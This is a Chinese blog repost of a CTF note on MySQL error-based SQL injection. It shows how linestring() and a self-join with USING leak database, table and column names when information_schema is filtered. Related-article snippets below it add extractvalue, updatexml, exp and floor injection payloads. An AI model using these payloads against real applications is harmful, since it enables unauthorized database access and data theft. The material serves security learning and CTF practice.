报错注入小技巧

最新推荐文章于 2024-08-12 15:40:55 发布
最新推荐文章于 2024-08-12 15:40:55 发布
阅读量193 收藏
点赞数
文章标签: 数据库
原文链接:http://www.cnblogs.com/wangshuwin/p/7867873.html
版权

这次Lctf看到pcat大佬的报错方法,就记录一下

这个题是把database,table,information这些都过滤了所以没法查infomation_schema查数据

所以这道题就用了select * from users where username='admin' and linestring(username);(linestring是Mysql自带的空间索引函数用来索引列名,还有一个函数也有这个效果polygon)这个语句进行报错。linestring(字段名)效果是这样的

1063328-20171120192549961-1206873524.png

可以看到很方便的就把数据库名和表名给爆出来了,而且这个函数通常不怎么会禁用而且这个语句配合/,%,=等连接符依然可以使用。以后报错的时候又多了一种思路,当然弊端就是你必须知道字段名。

接下来的可以用这个语句报错注入select * from users where username='admin' and (select * from(select * from cklm.users a join cklm.users b using(username))c);这个语句可以把username这个字段进行爆出来

1063328-20171120192619196-454356289.png

然后select * from users where username='admin' and (select * from(select * from cklm.users a join cklm.users b using(username,password))c);这样可以依次爆出剩下的字段

转载于:https://www.cnblogs.com/wangshuwin/p/7867873.html

aihuochou9723
关注
报错注入
qq_39298901的博客
02-17 701
一、简介 ​ 报错注入有12种,分别是:floor报错、ExtractValue报错、UpdateXml报错、NAME_CONST报错、join报错、exp报错、GeometryCollection报错、polygon报错、multipoint报错、multlinestring报错、multpolygon报错、linestring报错。本文将探究基于floor的sql报错注入,介绍其原理及利用方法。 二、相关函数 ​ 在讲原理之前我们需要先了解一下相关sql语句以及几个sql函数的知识,然后对才能对原理理.
DVWA SQL注入 小技巧
weixin_43817670的博客
10-29 1016
文章目录前言一、DVWA是什么?二、DVWA SQL注入1.LOW2.读入数据总结 前言 最近在学习网络安全,写这篇博客是为了分享技术丶学习参考,顺便也可以当笔记用,如果有什么地方说的不对,欢迎留言讨论,我会虚心学习的,那就让我们一起学习吧! 一、DVWA是什么? 如果你也刚刚接触网络安全,或者想学习网络安全,恰巧还没有可以入门学习的靶场,那么DVWA是一款非常适合你入门的的一个渗透测试演练系统。 二、DVWA SQL注入 1.LOW 提示:DVWA默认的账号为:admin 密码为:password 首
SQL注入(head、报错、盲注)
最新发布
m0_74249600的博客
08-12 1709
本文讲述了head注入、报错注入以及时间盲注与布尔盲注等sql注入的基本注入类型,之后我会继续出sql注入知识点总结直至完整,请关注持续更新(本文内容来自课件,如有版权问题请与我联系)
关于SQL注入的一些技巧分享
weixin_30345577的博客
12-29 179
先上一道简单的ctf注入题: 一道利用order by进行注入的ctf题 很不错的一道利用order by的注入题,之前不知道order by除了爆字段还有这种操作。 原题地址:http://chall.tasteless.eu/level1/index.php?dir= 直接进去dir后的参数是ASC,网页上有从1~10编号的10条信息。绕了一大圈反应出是order by后...
详解Spring @Autowired 注入小技巧
08-27
Spring @Autowired 注入小技巧 在 Spring 框架中,@Autowired 注解是用来实现自动依赖注入的。它可以根据类型(Type)进行自动注入,并且默认注入的 bean 为单例(SingleTon)的。下面我们来详解一些 @Autowired ...
详解Angular调试技巧之报错404(not found)
11-27
文件名大小写必须与引用时完全匹配,因为文件系统通常是区分大小写的。 2. **检查路径**:检查`myapp.js`的引用路径。在HTML文件中,通常使用`<script>`标签来引入JavaScript文件。在本例中,引用路径是`...
sql注入获取mysql版本信息_这可能是最全的SQL注入总结,很有用
weixin_28936857的博客
02-22 2505
SQL注入原理当客户端提交的数据未作处理或转义直接带入数据库,就造成了sql注入。攻击者通过构造不同的sql语句来实现对数据库的任意操作。SQL注入的分类按变量类型分:数字型和字符型按HTTP提交方式分:POST注入、GET注入和Cookie注入按注入方式分:布尔注入、联合注入、多语句注入、报错注入、延时注入、内联注入按数据库类型分:sql:oracle、MySQL、mssql、access、sq...
实验吧Web-易-简单的sql注入之3(报错的sql盲注之exp)
Sea_Sand息禅
12-18 388
题目提示是报错注入,于是就用盲注技巧来注入。 这里注入时发现floor,extractvalue,updatexml被吃掉了,用exp可以注入成功。(记住大小写绕过等技巧) 1.爆库 ' or exp(~(select * from(select database())a))# 这里最后面的a处可为别的字母,且必须要有 可以看到库名为web1。 2,爆表 ' or exp(~(...
聊聊错误注入技巧
走在前往架构师的路上
02-26 6429
前言什么是“错误注入”?错误注入指的是将错误引入到我们的程序中。可能有人会很好奇,这么做有什么目的呢?答案很简单:程序的测试。因为在很多时候,当我们要进行边缘情况测试的时候,往往模拟测试的场景不是非常好造的(尤其是分布式类的程序更是如此),这个时候,我们需要有快捷的方式将错误注入到程序中,以便在我们需要发生错误时,进行错误的产生。本文笔者将结合HDFS现有的错误注入方法来介绍此部分内容。错误注入技术
SQL报错注入
buffedon的博客
05-16 476
报错注入 原理 数据库的原始报错信息被直接打印在屏幕中。 报错注入函数 1. extractvalue() id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e))) 2. updatexml() id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1)) 3. exp() id=1 and exp(~(select * from(select user())a)) 流程 lim
SQL注入-报错注入
热门推荐
LJH1999ZN的博客
02-09 1万+
sql注入之报错注入的演示与介绍
SQL注入之报错注入
帅醉了的博客
03-03 1252
0x00_报错注入原理 构造报错payload让信息通过报错信息回显出来。在查询不回现内容,会答应错误信息。Update、insert等语句,会打印错误信息。 0x01_报错注入操作 floor()报错注入 mysql模板: concat:连接字符串功能 floor:去整数值 rand:取0~1之间的随机浮点值 group by:根据一个或多个列对结果集进行分组并有排序功能 select coun...
Web攻防训练营:GET报错注入详解
"第六节 GET报错注入-01" 在Web安全领域,GET报错注入是一种常见的SQL注入攻击方式,通常发生在使用GET方法传递参数到后台数据库查询时。这种攻击利用了应用程序对错误处理不当的漏洞,使得攻击者可以通过构造特定...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值